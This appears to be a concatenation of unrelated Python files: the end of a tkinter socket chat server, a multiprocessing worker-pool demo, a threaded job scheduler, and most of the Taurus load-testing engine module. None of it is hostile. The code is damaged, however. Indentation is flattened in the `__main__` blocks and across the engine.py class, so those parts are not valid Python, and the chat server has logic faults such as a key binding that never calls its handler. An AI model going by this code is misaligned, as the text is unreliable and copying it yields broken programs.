        literal 'I' is a keep-alive and is ignored.
        NOTE(review): pops from CONNECTED while iterating it, which skips
        the following client for one round — left as-is to preserve behavior.
        """
        while len(CONNECTED) > 0:
            time.sleep(1)
            for i in CONNECTED:
                try:
                    rec_messages = (i.recv(110232).decode())
                    print("messahe recived : ", rec_messages)
                    if rec_messages == 'I':
                        continue
                    try:
                        id_to_remove = int(rec_messages)
                        print(id_to_remove)
                        CONNECTED.pop(id_to_remove-1)
                        Server.change_button(str(PARTICIPANTS[id_to_remove-1]) + " left the room", "pink")
                        Notify.show_toast("prichat", str(PARTICIPANTS[id_to_remove-1]) + " left the room", duration=1)
                        PARTICIPANTS.pop(id_to_remove-1)
                    except:
                        pass
                    Notify.show_toast("prichat", rec_messages, duration=1)
                    MessageWindow.insert(END, rec_messages+'')
                except :
                    pass

    def push_message():
        """sending messages to clients"""
        outbox_message = MessageBox.get()
        if outbox_message == '':
            pass
        else:
            MessageBox.delete(0, "end")
            outbox_message = ' : '+outbox_message+" "+datetime.now().strftime("%H:%M:%S")
            for client_list in CONNECTED:
                MessageWindow.insert(
                    END, 'YOU '+outbox_message, font.Font(weight="bold"))
                client_list.send(bytes(USERNAME+outbox_message+'\n', 'utf-8'))
                time.sleep(1)

    def change_button(button_text, button_color):
        """change status button"""
        try:
            Status['text'] = button_text
            Status.config(bg=button_color)
        except RuntimeError:
            pass

    def connection_manager():
        """manage the server client connections"""
        host_config['state'] = 'disable'
        UserNameEntry['state'] = 'disable'
        global CONNECTED
        global USERNAME
        global PARTICIPANTS
        CONNECTED = []
        try:threading.Thread(target=Server.update).start()
        except :pass
        PARTICIPANTS = []
        # Port is taken from the "ip:port" entry, right after the ip prefix.
        port_number = str(host_config.get())[len(Ip)+1:len(Ip)+5]
        USERNAME = UserNameEntry.get()
        try:
            server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            server_socket.bind((Ip, int(port_number)))
            server_socket.listen(3)
            Server.change_button("CONNECTED TO PORT : " +str(port_number), 'light green')
            MessageWindow.config(bg='white')
        except:
            Server.change_button('COULD NOT CONNECT', 'red')
        while True:
            connected_client, addr = server_socket.accept()
            CONNECTED.append(connected_client)
            connected_client.send(bytes(str(str(len(CONNECTED))+str(USERNAME)), 'utf-8'))
            print("DATA SEND")
            PARTICIPANTS.append(connected_client.recv(110232).decode())
            Server.change_button(PARTICIPANTS[len(CONNECTED)-1]+' ENTERED THE ROOM', 'light blue')
            try:threading.Thread(target=Server.pull_message).start()
            except :pass

    def fetch_user_data():
        """get the user hostname and ip"""
        return (socket.gethostname(), socket.gethostbyname(socket.gethostname()))

    def participation_window():
        """Open a window listing the current participants.

        BUG FIX: this previously called ``tkinter()`` — the module object is
        not callable, so the method always raised TypeError.  The window is
        now created with ``tkinter.Tk()``.
        """
        participants_app = tkinter.Tk()
        participants_app.title("Participants")
        text_box = tkinter.Text(
            participants_app, height=13, width=32, font=(12))
        text_box.grid(row=0, column=0)
        text_box.config(bg='#D9D8D7')
        scroll_bar = Scrollbar(participants_app, orient=VERTICAL)
        scroll_bar.grid(row=0, column=1, sticky=NS)
        text_box.config(yscrollcommand=scroll_bar.set)
        scroll_bar.config(command=text_box.yview)
        spacing = 0
        text_box.insert(END, "participants"+'\n')
        text_box.insert(END, " "+'\n')
        for clients_list in PARTICIPANTS:
            text_box.insert(END, clients_list+'\n')
            spacing += 30
        text_box['state'] = 'disable'
        participants_app.mainloop()
if __name__ == "__main__":
root = tkinter.Tk()
root.title("server")
try:root.iconbitmap("./icon_chat_app.ico")
except :pass
root.geometry("300x391")
root.maxsize(300, 391)
Status = Button(root, text="PRESS TO CONNECT", width=45, height=1,
command=Server.unlock, borderwidth=0)
Status.place(x=0, y=0)
HostName, Ip = Server.fetch_user_data()
host_config = Entry(root)
host_config.place(x=0, y=25, width=150, height=35)
host_config.insert(END, Ip+':9999')
UserNameEntry = Entry(root)
UserNameEntry.place(x=150, y=25, width=151, height=35)
UserNameEntry.insert(END, HostName)
MessageWindow = Text(root, width=38, height=17, bg='grey', borderwidth=0)
MessageWindow.place(y=65, x=0)
MessageBox = tkinter.Entry(root, borderwidth=1)
MessageBox.place(x=0, y=340, width=245, height=47)
SendButton = Button(root, text="send", height=3, width=8,
borderwidth=0, bg='light green', command=Server.push_message)
SendButton.place(x=244, y=340)
root.bind('<Return>', lambda event: Server.push_message)
SendButton = Button(root, text="File", height=3, width=8, borderwidth=0,
bg='light blue', command=Server.push_message)
SendButton.place(x=344, y=340)
root.protocol('WM_DELETE_WINDOW', Server.close_app)
root.mainloop()
|
mp_workers.py | #
# Simple example which uses a pool of workers to carry out some tasks.
#
# Notice that the results will probably not come out of the output
# queue in the same order as the corresponding tasks were
# put on the input queue. If it is important to get the results back
# in the original order then consider using `Pool.map()` or
# `Pool.imap()` (which will save on the amount of code needed anyway).
#
# Copyright (c) 2006-2008, R Oudkerk
# All rights reserved.
#
import time
import random
from multiprocessing import Process, Queue, current_process, freeze_support
#
# Function run by worker processes
#
def worker(input, output):
    """Consume (func, args) tasks from *input* until the 'STOP' sentinel,
    pushing each formatted result onto *output*."""
    while True:
        task = input.get()
        if task == 'STOP':
            break
        func, args = task
        output.put(calculate(func, args))
#
# Function used to calculate result
#
def calculate(func, args):
    """Apply *func* to *args* and describe the result, tagged with the
    name of the process doing the work."""
    outcome = func(*args)
    return '%s says that %s%s = %s' % (
        current_process().name, func.__name__, args, outcome)
#
# Functions referenced by tasks
#
def mul(a, b):
    """Return a * b after a short random delay (simulated work)."""
    time.sleep(random.random() * 0.5)
    return a * b
def plus(a, b):
    """Return a + b after a short random delay (simulated work)."""
    time.sleep(random.random() * 0.5)
    return a + b
#
#
#
def test():
    """Demonstrate a pool of worker processes fed via queues.

    Results come back in completion order, not submission order.

    BUG FIX: the original used Python 2 ``print`` statements, which are
    syntax errors under Python 3 even though the rest of the file is
    Python-3 compatible; they are now ``print()`` calls.
    """
    NUMBER_OF_PROCESSES = 4
    TASKS1 = [(mul, (i, 7)) for i in range(20)]
    TASKS2 = [(plus, (i, 8)) for i in range(10)]
    # Create queues
    task_queue = Queue()
    done_queue = Queue()
    # Submit tasks
    for task in TASKS1:
        task_queue.put(task)
    # Start worker processes
    for i in range(NUMBER_OF_PROCESSES):
        Process(target=worker, args=(task_queue, done_queue)).start()
    # Get and print results
    print('Unordered results:')
    for i in range(len(TASKS1)):
        print('\t', done_queue.get())
    # Add more tasks using `put()`
    for task in TASKS2:
        task_queue.put(task)
    # Get and print some more results
    for i in range(len(TASKS2)):
        print('\t', done_queue.get())
    # Tell child processes to stop
    for i in range(NUMBER_OF_PROCESSES):
        task_queue.put('STOP')
if __name__ == '__main__':
freeze_support()
test()
|
simplequeue.py | import threading
from multiprocessing import Process
from . import runjob, jobid, store
class Scheduler(object):
    """Serial job queue: runs submitted jobs one at a time in a child Process.

    A single monitor thread (_run_queue) waits on the _nextjob event, pops
    the oldest pending id, and executes it via runjob.run inside a
    multiprocessing.Process.  All shared maps (_info/_status/_results) are
    guarded by _lock.  Status flow: PENDING -> ACTIVE -> <result status>,
    with CANCEL on cancellation and UNKNOWN for ids never seen.
    NOTE(review): indentation reconstructed from a flattened dump.
    """

    def __init__(self):
        self._lock = threading.Lock()       # guards all shared state below
        self._nextjob = threading.Event()   # set whenever work may be pending
        self._jobs = []                     # all known job ids, submission order
        self._pending = []                  # ids waiting to run (FIFO)
        self._info = {}                     # id -> request dict
        self._status = {}                   # id -> status string
        self._results = {}                  # id -> results dict
        # NOTE(review): the monitor thread is non-daemon, so the process
        # cannot exit while it loops.  Also _stopping and _current_process
        # are first assigned inside _run_queue, so cancel() called before
        # any job has started would raise AttributeError — consider
        # initializing both to None here; confirm against callers.
        self._jobmonitor = threading.Thread(target=self._run_queue)
        self._jobmonitor.start()
        self._current_id = None             # id of the job currently running, if any

    def _run_queue(self):
        """Monitor loop: run pending jobs one at a time (never returns)."""
        while True:
            self._nextjob.wait()
            with self._lock:
                if not self._pending:
                    # Queue drained (or spurious wake): sleep until next submit.
                    self._nextjob.clear()
                    continue
                self._current_id = self._pending.pop(0)
                self._status[self._current_id] = 'ACTIVE'
                request = self._info[self._current_id]
                self._stopping = None       # reset the cancel marker for this job
                self._current_process = Process(target=runjob.run,
                    args=(self._current_id, request))
                self._current_process.start()
            # Join outside the lock so submit()/cancel() stay responsive
            # while the job runs.
            self._current_process.join()
            results = runjob.results(self._current_id)
            with self._lock:
                self._results[self._current_id] = results
                self._status[self._current_id] = results['status']

    def jobs(self, status=None):
        """Return all job ids, or only those whose status equals *status*."""
        with self._lock:
            if status is None:
                response = self._jobs[:]
            else:
                response = [j for j in self._jobs if self._status[j] == status]
        return response

    def submit(self, request, origin):
        """Register *request*, persist it via store, queue it, and return
        its new job id.  *origin* is accepted but unused in this method."""
        with self._lock:
            id = int(jobid.get_jobid())
            store.create(id)
            store.put(id, 'request', request)
            request['id'] = id
            self._jobs.append(id)
            self._info[id] = request
            self._status[id] = 'PENDING'
            self._results[id] = {'status': 'PENDING'}
            self._pending.append(id)
            self._nextjob.set()             # wake the monitor thread
        return id

    def results(self, id):
        """Return the results dict for *id* ({'status': 'UNKNOWN'} if absent)."""
        with self._lock:
            return self._results.get(id, {'status': 'UNKNOWN'})

    def status(self, id):
        """Return the status string for *id* ('UNKNOWN' if absent)."""
        with self._lock:
            return self._status.get(id, 'UNKNOWN')

    def info(self, id):
        """Return the original request for *id* (raises KeyError if unknown)."""
        with self._lock:
            return self._info[id]

    def cancel(self, id):
        """Cancel *id*: remove it from the pending queue and, if it is the
        job currently running, terminate its process."""
        with self._lock:
            try: self._pending.remove(id)
            except ValueError: pass
            # _stopping guards against terminating the same process twice.
            if self._current_id == id and not self._stopping == id:
                self._stopping = id
                self._current_process.terminate()
            # NOTE(review): placement reconstructed — the job is marked
            # CANCEL whether it was pending or active.
            self._status[id] = 'CANCEL'

    def delete(self, id):
        """Cancel *id* and remove every trace of it, in memory and in store."""
        self.cancel(id)
        with self._lock:
            try: self._jobs.remove(id)
            except ValueError: pass
            self._info.pop(id, None)
            self._results.pop(id, None)
            self._status.pop(id, None)
            store.destroy(id)
|
engine.py | """
Main BZT classes
Copyright 2015 BlazeMeter Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import codecs
import copy
import datetime
import json
import logging
import os
import pkgutil
import re
import shutil
import sys
import threading
import time
import traceback
import uuid
from distutils.version import LooseVersion
import bzt
from bzt import ManualShutdown, get_configs_dir, TaurusConfigError, TaurusInternalException
from bzt.six import string_types, text_type, parse, reraise
from bzt.utils import load_class, BetterDict, ensure_is_dict, dehumanize_time, is_windows, is_linux
from bzt.utils import shell_exec, get_full_path, ExceptionalDownloader, get_uniq_name, HTTPClient, Environment
from .dicts import Configuration
from .modules import Provisioning, Reporter, Service, Aggregator, EngineModule
from .names import EXEC, TAURUS_ARTIFACTS_DIR, SETTINGS
from .templates import Singletone
class Engine(object):
"""
Core entity of the technology, used to coordinate whole process
:type reporters: list[Reporter]
:type services: list[Service]
:type log: logging.Logger
:type aggregator: bzt.modules.aggregator.ConsolidatingAggregator
:type stopping_reason: BaseException
"""
ARTIFACTS_DIR = "%Y-%m-%d_%H-%M-%S.%f"
def __init__(self, parent_logger):
    """
    Create an engine with empty module lists; concrete modules are
    instantiated later by configure()/prepare().

    :type parent_logger: logging.Logger
    """
    self.file_search_paths = []
    self.services = []
    self.__artifacts = []
    self.reporters = []
    self.artifacts_dir = None
    self.log = parent_logger.getChild(self.__class__.__name__)
    self.env = Environment(self.log)  # backward compatibility
    self.shared_env = Environment(self.log)  # backward compatibility
    self.config = Configuration()
    self.config.log = self.log.getChild(Configuration.__name__)
    self.modules = {}  # available modules
    self.provisioning = Provisioning()
    self.aggregator = Aggregator(is_functional=False)
    self.aggregator.engine = self
    self.interrupted = False        # set externally to request ManualShutdown in _wait()
    self.check_interval = 1         # seconds; overridden from settings in prepare()
    self.stopping_reason = None     # first exception that stopped the run, if any
    self.engine_loop_utilization = 0
    self.prepared = []
    self.started = []
    self.default_cwd = None
    # No-op hooks by default; callers may replace them to mute/restore logging
    # around the run loop.
    self.logging_level_down = lambda: None
    self.logging_level_up = lambda: None
    self._http_client = None
def configure(self, user_configs, read_config_files=True):
    """
    Load configuration files

    Merges base configs (optional), then user configs, then resolves
    "included-configs" recursively; finally kicks off an async update check
    when enabled.

    :type user_configs: list[str]
    :type read_config_files: bool
    """
    self.log.info("Configuring...")

    if read_config_files:
        self._load_base_configs()

    merged_config = self._load_user_configs(user_configs)

    all_includes = []
    # Each load may introduce new "included-configs"; loop until none remain.
    # Files already seen and the user configs themselves are skipped.
    while "included-configs" in self.config:
        includes = self.config.pop("included-configs")
        included_configs = [self.find_file(conf) for conf in includes if conf not in all_includes + user_configs]
        all_includes += includes
        self.config.load(included_configs)
    self.config['included-configs'] = all_includes

    self.config.merge({"version": bzt.VERSION})
    self.get_http_client()

    if self.config.get(SETTINGS).get("check-updates", True):
        install_id = self.config.get("install-id", self._generate_id())

        def wrapper():
            return self._check_updates(install_id)

        thread = threading.Thread(target=wrapper)  # intentionally non-daemon thread
        thread.start()

    return merged_config
def unify_config(self):
    """Normalize the config in place: wrap a lone execution dict in a list,
    verify each execution has an executor (falling back to the settings
    default, else raising TaurusConfigError), and coerce reporting/services/
    modules entries into dict form."""
    execution_list = self.config.get(EXEC, [])
    if isinstance(execution_list, dict):
        execution_list = [execution_list]
    self.config[EXEC] = execution_list

    settings = self.config.get(SETTINGS)
    default_executor = settings.get("default-executor", None)
    prov_type = self.config.get(Provisioning.PROV)

    for execution in execution_list:  # type: BetterDict
        # force_set writes the default back into the execution entry
        executor = execution.get("executor", default_executor, force_set=True)
        if not executor:
            msg = "Cannot determine executor type and no default executor in %s"
            raise TaurusConfigError(msg % execution)

    for section in (self.config.get(Reporter.REP, []), self.config.get(Service.SERV, [])):
        for index in range(len(section)):
            ensure_is_dict(section, index, "module")

    modules = self.config.get("modules")
    for module in modules:
        ensure_is_dict(modules, module, "class")
@staticmethod
def _generate_id():
    """Build a semi-anonymous install id: '<ci-or-os prefix>-<MAC as hex>'.

    The first matching probe wins; probe order is significant.
    """
    probes = (
        ("jenkins", lambda: os.getenv("JENKINS_HOME")),
        ("travis", lambda: os.getenv("TRAVIS")),
        ("bamboo", lambda: any([key.startswith("bamboo") for key in os.environ.keys()])),
        ("teamcity", lambda: os.getenv("TEAMCITY_VERSION")),
        ("docker", lambda: os.getenv("DOCKER_HOST")),
        # NOTE(review): checks a variable literally named "AWS_" — confirm intent.
        ("amazon", lambda: os.getenv("AWS_")),
        ("google_cloud", lambda: os.getenv("GOOGLE_APPLICATION_CREDENTIALS") or os.getenv("CLOUDSDK_CONFIG")),
        ("azure", lambda: os.getenv("WEBJOBS_NAME")),
        ("linux", is_linux),
        ("windows", is_windows),
    )
    prefix = 'macos'
    for name, probe in probes:
        if probe():
            prefix = name
            break
    return "%s-%x" % (prefix, uuid.getnode())
def prepare(self):
    """
    Prepare engine for work, will call preparing of Provisioning and add
    downstream EngineModule instances

    Normalizes the config, resolves the check interval, then prepares
    aggregator, services, provisioning and reporters (in that order).
    Any failure is recorded as stopping_reason and re-raised.
    """
    self.log.info("Preparing...")
    self.unify_config()
    interval = self.config.get(SETTINGS).get("check-interval", self.check_interval)
    self.check_interval = dehumanize_time(interval)

    try:
        self.__prepare_aggregator()
        self.__prepare_services()
        self.__prepare_provisioning()
        self.__prepare_reporters()
        self.config.dump()
    except BaseException as exc:
        # Remember what broke the run so reporting can attribute the failure.
        self.stopping_reason = exc
        raise
def _startup(self):
modules = self.services + [self.aggregator] + self.reporters + [self.provisioning] # order matters
for module in modules:
self.log.debug("Startup %s", module)
self.started.append(module)
module.startup()
self.config.dump()
def start_subprocess(self, args, env, cwd=None, **kwargs):
    """Spawn a child process via shell_exec; cwd defaults to the engine's default_cwd."""
    effective_cwd = self.default_cwd if cwd is None else cwd
    return shell_exec(args, cwd=effective_cwd, env=env.get(), **kwargs)
def run(self):
    """
    Run the job. Calls `startup`, does periodic `check`,
    calls `shutdown` in any case
    """
    self.log.info("Starting...")
    exc_info = exc_value = None
    try:
        self._startup()
        # reduce log verbosity for the duration of the run loop
        self.logging_level_down()
        self._wait()
    except BaseException as exc:
        self.log.debug("%s:\n%s", exc, traceback.format_exc())
        # only the FIRST failure becomes the stopping reason
        if not self.stopping_reason:
            self.stopping_reason = exc
        exc_value = exc
        exc_info = sys.exc_info()
    finally:
        self.log.warning("Please wait for graceful shutdown...")
        try:
            self.logging_level_up()
            self._shutdown()
        except BaseException as exc:
            self.log.debug("%s:\n%s", exc, traceback.format_exc())
            if not self.stopping_reason:
                self.stopping_reason = exc
            # an exception from startup/_wait takes precedence over shutdown errors
            if not exc_value:
                exc_value = exc
                exc_info = sys.exc_info()

    # re-raise the first captured exception, preserving its traceback
    if exc_value:
        reraise(exc_info, exc_value)
def _check_modules_list(self):
stop = False
modules = [self.provisioning, self.aggregator] + self.services + self.reporters # order matters
for module in modules:
if module in self.started:
self.log.debug("Checking %s", module)
finished = bool(module.check())
if finished:
self.log.debug("%s finished", module)
stop = finished
return stop
def _wait(self):
    """
    Wait modules for finish
    :return:
    """
    prev = time.time()

    # poll modules until one of them reports it has finished
    while not self._check_modules_list():
        now = time.time()
        diff = now - prev
        delay = self.check_interval - diff
        # fraction of the check interval spent doing work; > 1.0 means the
        # loop cannot keep up with the configured interval
        self.engine_loop_utilization = diff / self.check_interval
        self.log.debug("Iteration took %.3f sec, sleeping for %.3f sec...", diff, delay)
        if delay > 0:
            time.sleep(delay)
        prev = time.time()
        if self.interrupted:
            raise ManualShutdown()
    self.config.dump()
def _shutdown(self):
    """
    Shutdown modules
    :return:
    """
    self.log.info("Shutting down...")
    self.log.debug("Current stop reason: %s", self.stopping_reason)
    exc_info = exc_value = None
    modules = [self.provisioning, self.aggregator] + self.reporters + self.services  # order matters
    for module in modules:
        try:
            # only shut down modules that were actually started
            if module in self.started:
                module.shutdown()
        except BaseException as exc:
            # keep shutting down the remaining modules; remember the first error
            self.log.debug("%s:\n%s", exc, traceback.format_exc())
            if not self.stopping_reason:
                self.stopping_reason = exc
            if not exc_value:
                exc_value = exc
                exc_info = sys.exc_info()

    self.config.dump()
    # re-raise the first shutdown failure, preserving its traceback
    if exc_value:
        reraise(exc_info, exc_value)
def post_process(self):
    """
    Do post-run analysis and processing for the results.
    """
    self.log.info("Post-processing...")
    # :type exception: BaseException
    exc_info = exc_value = None
    modules = [self.provisioning, self.aggregator] + self.reporters + self.services  # order matters
    # services are last because of shellexec which is "final-final" action
    for module in modules:
        # only post-process modules that completed their prepare()
        if module in self.prepared:
            try:
                module.post_process()
            except BaseException as exc:
                # KeyboardInterrupt gets a terse line; other errors a full traceback
                if isinstance(exc, KeyboardInterrupt):
                    self.log.debug("post_process: %s", exc)
                else:
                    self.log.debug("post_process: %s\n%s", exc, traceback.format_exc())
                # continue post-processing other modules; remember first error
                if not self.stopping_reason:
                    self.stopping_reason = exc
                if not exc_value:
                    exc_value = exc
                    exc_info = sys.exc_info()
    self.config.dump()

    # re-raise the first captured failure, preserving its traceback
    if exc_info:
        reraise(exc_info, exc_value)
def create_artifact(self, prefix, suffix):
    """
    Create new artifact in artifacts dir with given prefix and suffix

    :type prefix: str
    :type suffix: str
    :return: Path to created file
    :rtype: str
    :raise TaurusInternalException: if no artifacts dir set
    """
    if not self.artifacts_dir:
        raise TaurusInternalException("Cannot create artifact: no artifacts_dir set up")

    new_path = get_uniq_name(self.artifacts_dir, prefix, suffix, self.__artifacts)
    self.__artifacts.append(new_path)
    self.log.debug("New artifact filename: %s", new_path)
    return new_path
def existing_artifact(self, filename, move=False, target_filename=None):
    """
    Add existing artifact, it will be collected into artifact_dir. If
    move=True, the original file will be deleted

    :type filename: str
    :type move: bool
    :type target_filename: str
    """
    self.log.debug("Add existing artifact (move=%s): %s", move, filename)
    if self.artifacts_dir is None:
        self.log.warning("Artifacts dir has not been set, will not copy %s", filename)
        return

    new_filename = os.path.basename(filename) if target_filename is None else target_filename
    new_name = os.path.join(self.artifacts_dir, new_filename)
    self.__artifacts.append(new_name)

    # source is already at destination: register it but do not copy onto itself
    if get_full_path(filename) == get_full_path(new_name):
        self.log.debug("No need to copy %s", filename)
        return
    if not os.path.exists(filename):
        self.log.warning("Artifact file not exists: %s", filename)
        return

    if move:
        self.log.debug("Moving %s to %s", filename, new_name)
        shutil.move(filename, new_name)
    else:
        self.log.debug("Copying %s to %s", filename, new_name)
        shutil.copy(filename, new_name)
def create_artifacts_dir(self, existing_artifacts=(), merged_config=None):
    """
    Create directory for artifacts, directory name based on datetime.now()
    """
    if not self.artifacts_dir:
        # the configured value is a strftime() template, e.g. with %Y-%m-%d
        artifacts_dir = self.config.get(SETTINGS, force_set=True).get("artifacts-dir", self.ARTIFACTS_DIR)
        self.artifacts_dir = datetime.datetime.now().strftime(artifacts_dir)
    self.artifacts_dir = get_full_path(self.artifacts_dir)

    self.log.info("Artifacts dir: %s", self.artifacts_dir)
    # expose location to child processes through the environment
    os.environ[TAURUS_ARTIFACTS_DIR] = self.artifacts_dir

    if not os.path.isdir(self.artifacts_dir):
        os.makedirs(self.artifacts_dir)

    # dump current effective configuration
    dump = self.create_artifact("effective", "")  # TODO: not good since this file not exists
    self.config.set_dump_file(dump)
    self.config.dump()

    # dump merged configuration
    if merged_config:
        merged_config.dump(self.create_artifact("merged", ".yml"), Configuration.YAML)
        merged_config.dump(self.create_artifact("merged", ".json"), Configuration.JSON)
    for artifact in existing_artifacts:
        self.existing_artifact(artifact)
def is_functional_mode(self):
    """Tell whether functional-testing aggregation is active for this engine."""
    if self.aggregator is None:
        return False
    return self.aggregator.is_functional
def __load_module(self, alias):
    """
    Load module class by alias

    :param alias: str
    :return: class
    """
    # cached from a previous lookup
    if alias in self.modules:
        return self.modules[alias]

    mod_conf = self.config.get('modules')
    if alias not in mod_conf:
        msg = "Module '%s' not found in list of available aliases %s" % (alias, sorted(mod_conf.keys()))
        raise TaurusConfigError(msg)

    settings = ensure_is_dict(mod_conf, alias, "class")

    # log a deep copy with sensitive values masked out
    acopy = copy.deepcopy(settings)
    BetterDict.traverse(acopy, Configuration.masq_sensitive)
    self.log.debug("Module config: %s %s", alias, acopy)

    # BetterDict.get raises the passed error when the key is missing
    err = TaurusConfigError("Class name for alias '%s' is not found in module settings: %s" % (alias, settings))
    clsname = settings.get('class', err)

    self.modules[alias] = load_class(clsname)
    if not issubclass(self.modules[alias], EngineModule):
        raise TaurusInternalException("Module class does not inherit from EngineModule: %s" % clsname)

    return self.modules[alias]
def instantiate_module(self, alias):
    """
    Create new instance for module using its alias from module settings
    section of config. Thus, to instantiate module it should be mentioned
    in settings.

    :type alias: str
    :rtype: EngineModule
    """
    classobj = self.__load_module(alias)
    instance = classobj()
    assert isinstance(instance, EngineModule)
    # wire the module into this engine: child logger, back-reference, settings
    instance.log = self.log.getChild(alias)
    instance.engine = self
    settings = self.config.get("modules")
    instance.settings = settings.get(alias)
    return instance
def find_file(self, filename):
    """
    Try to find file or dir in search_path if it was specified. Helps finding files
    in non-CLI environments or relative to config path
    Return path is full and mustn't treat with abspath/etc.

    :param filename: file basename to find
    :type filename: str
    """
    if not filename:
        return filename

    if filename.lower().startswith("http://") or filename.lower().startswith("https://"):
        # remote resource: download into the artifacts dir, return local path
        parsed_url = parse.urlparse(filename)
        downloader = ExceptionalDownloader(self.get_http_client())
        self.log.info("Downloading %s", filename)
        tmp_f_name, headers = downloader.get(filename)
        # prefer the server-suggested name from Content-Disposition
        cd_header = headers.get('Content-Disposition', '')
        dest = cd_header.split('filename=')[-1] if cd_header and 'filename=' in cd_header else ''
        if dest.startswith('"') and dest.endswith('"') or dest.startswith("'") and dest.endswith("'"):
            dest = dest[1:-1]
        elif not dest:
            dest = os.path.basename(parsed_url.path)
        # last resort: derive a name from the host when URL has no basename
        fname, ext = os.path.splitext(dest) if dest else (parsed_url.hostname.replace(".", "_"), '.file')
        dest = self.create_artifact(fname, ext)
        self.log.debug("Moving %s to %s", tmp_f_name, dest)
        shutil.move(tmp_f_name, dest)
        return dest
    else:
        filename = os.path.expanduser(filename)  # expanding of '~' is required for check of existence
        # check filename 'as is' and all combinations of file_search_path/filename
        for dirname in [""] + self.file_search_paths:
            location = os.path.join(dirname, filename)
            if os.path.exists(location):
                if dirname:
                    self.log.warning("Guessed location from search paths for %s: %s", filename, location)
                return get_full_path(location)

    # not found anywhere: warn, but hand back the original name unchanged
    self.log.warning("Could not find location at path: %s", filename)
    return filename
def _load_base_configs(self):
    """Discover bundled base configs (system dir + installed packages) and load them."""
    configs = []
    try:
        sys.path.insert(0, os.path.curdir)  # necessary for development mode (running bzt from curdir)
        configs.extend(self._scan_system_configs())
        configs.extend(self._scan_package_configs())
    finally:
        # always undo the sys.path tweak, even if scanning fails
        sys.path.pop(0)
    # deterministic load order regardless of discovery order
    configs.sort(key=os.path.basename)
    self.log.debug("Base configs list: %s", configs)
    if not configs:
        self.log.warning("No base configs were discovered")
    self.config.load(configs)
def _scan_package_configs(self):
configs = []
for importer, modname, ispkg in pkgutil.iter_modules(path=None):
try:
if not ispkg:
continue
package_path = getattr(importer, 'path', None)
if package_path is None:
continue
index_path = os.path.join(package_path, modname, 'bzt-configs.json')
if not os.path.exists(index_path):
continue
try:
with codecs.open(index_path, 'rb', encoding='utf-8') as fds:
index_configs = json.load(fds)
except (OSError, IOError, ValueError) as exc:
self.log.debug("Can't load package-specific bzt config %s: %s", index_path, exc)
continue
if not isinstance(index_configs, list):
self.log.debug("Error: value of bzt-configs.json should be a list (%s)" % index_path)
continue
for config_name in index_configs:
configs.append(os.path.join(importer.path, modname, config_name))
except BaseException as exc:
self.log.warning("Can't look for package configs in package %r: %s", modname, str(exc))
self.log.debug("Traceback: %s", traceback.format_exc())
return configs
def _scan_system_configs(self):
    """Collect machine-wide config files from the system configs dir, sorted by name."""
    machine_dir = get_configs_dir()  # can't refactor machine_dir out - see setup.py
    if not os.path.isdir(machine_dir):
        return []
    self.log.debug("Reading system configs from: %s", machine_dir)
    candidates = (os.path.join(machine_dir, entry) for entry in sorted(os.listdir(machine_dir)))
    return [path for path in candidates if os.path.isfile(path)]
def _load_user_configs(self, user_configs):
    """
    :type user_configs: list[str]
    :rtype: Configuration
    """
    # "tab-replacement-spaces" is not documented 'cause it loads only from base configs
    # so it's sort of half-working last resort
    self.config.tab_replacement_spaces = self.config.get(SETTINGS).get("tab-replacement-spaces", 4)
    self.log.debug("User configs list: %s", user_configs)
    self.config.load(user_configs)
    # also build a separate Configuration holding only the user files merged;
    # it is used later for the "merged" artifacts dump
    user_config = Configuration()
    user_config.log = self.log.getChild(Configuration.__name__)
    user_config.tab_replacement_spaces = self.config.tab_replacement_spaces
    user_config.warn_on_tab_replacement = False
    # __config_loaded callback records each config's dir as a file search path
    user_config.load(user_configs, self.__config_loaded)
    return user_config
def __config_loaded(self, config):
    """Remember the directory of each loaded config file as a file search path."""
    config_dir = get_full_path(config, step_up=1)
    self.file_search_paths.append(config_dir)
def __prepare_provisioning(self):
    """Instantiate the configured provisioning module and prepare it."""
    err = TaurusConfigError("Please check global config availability or configure provisioning settings")
    alias = self.config.get(Provisioning.PROV, err)
    self.provisioning = self.instantiate_module(alias)
    self.prepared.append(self.provisioning)
    self.provisioning.prepare()
def __prepare_reporters(self):
    """
    Instantiate reporters, then prepare them in case they would like to interact
    """
    reporting = self.config.get(Reporter.REP, [])
    for index, reporter in enumerate(reporting):
        msg = "reporter 'module' field isn't recognized: %s"
        cls = reporter.get('module', TaurusConfigError(msg % reporter))
        instance = self.instantiate_module(cls)
        instance.parameters = reporter
        # Singletone reporters get merged into an existing instance
        if self.__singletone_exists(instance, self.reporters):
            continue
        assert isinstance(instance, Reporter)
        self.reporters.append(instance)

    # drop reporters that decline to run in this configuration
    # (iterate over a copy since we remove from the list)
    for reporter in self.reporters[:]:
        if not reporter.should_run():
            self.reporters.remove(reporter)

    # prepare reporters
    for module in self.reporters:
        self.prepared.append(module)
        module.prepare()
def __prepare_services(self):
    """
    Instantiate service modules, then prepare them
    """
    srv_config = self.config.get(Service.SERV, [])
    services = []
    for index, config in enumerate(srv_config):
        cls = config.get('module', '')
        instance = self.instantiate_module(cls)
        instance.parameters = config
        # Singletone services get merged into an existing instance
        if self.__singletone_exists(instance, services):
            continue
        assert isinstance(instance, Service)
        services.append(instance)

    # drop services that decline to run in this configuration
    # (iterate over a copy since we remove from the list)
    for service in services[:]:
        if not service.should_run():
            services.remove(service)

    self.services.extend(services)

    for module in self.services:
        self.prepared.append(module)
        module.prepare()
def __singletone_exists(self, instance, mods_list):
    """
    Check whether a Singletone module of the same type is already present in
    mods_list; if so, merge the new instance's parameters into the existing
    module and report True.

    :type instance: EngineModule
    :type mods_list: list[EngineModule]
    :rtype: bool
    """
    if not isinstance(instance, Singletone):
        return False

    for mod in mods_list:
        if mod.parameters.get("module") == instance.parameters.get("module"):
            msg = "Module '%s' can be only used once, will merge all new instances into single"
            self.log.warning(msg % mod.parameters.get("module"))
            mod.parameters.merge(instance.parameters)
            return True

    # previously this fell off the end and implicitly returned None;
    # return an explicit False for a consistent boolean contract
    return False
def __prepare_aggregator(self):
    """Instantiate and prepare the configured results aggregator, if any."""
    alias = self.config.get(SETTINGS).get("aggregator", "")
    if not alias:
        self.log.warning("Proceeding without aggregator, no results analysis")
